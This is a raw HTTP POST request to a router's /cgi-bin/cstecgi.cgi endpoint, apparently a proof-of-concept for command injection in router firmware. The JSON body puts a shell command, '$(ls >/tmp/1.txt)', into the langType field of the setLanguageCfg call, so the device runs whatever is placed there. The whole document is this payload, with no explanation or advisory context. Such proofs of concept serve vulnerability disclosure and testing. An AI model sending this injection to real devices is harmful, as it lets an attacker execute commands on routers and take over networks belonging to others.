POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
Content-Length: 70
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.254
Referer: http://192.168.0.254/wireless/repeater.asp?timestamp=1659447439258
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"topicurl":"setting/setLanguageCfg","langType":"en$(ls >/tmp/1.txt)"}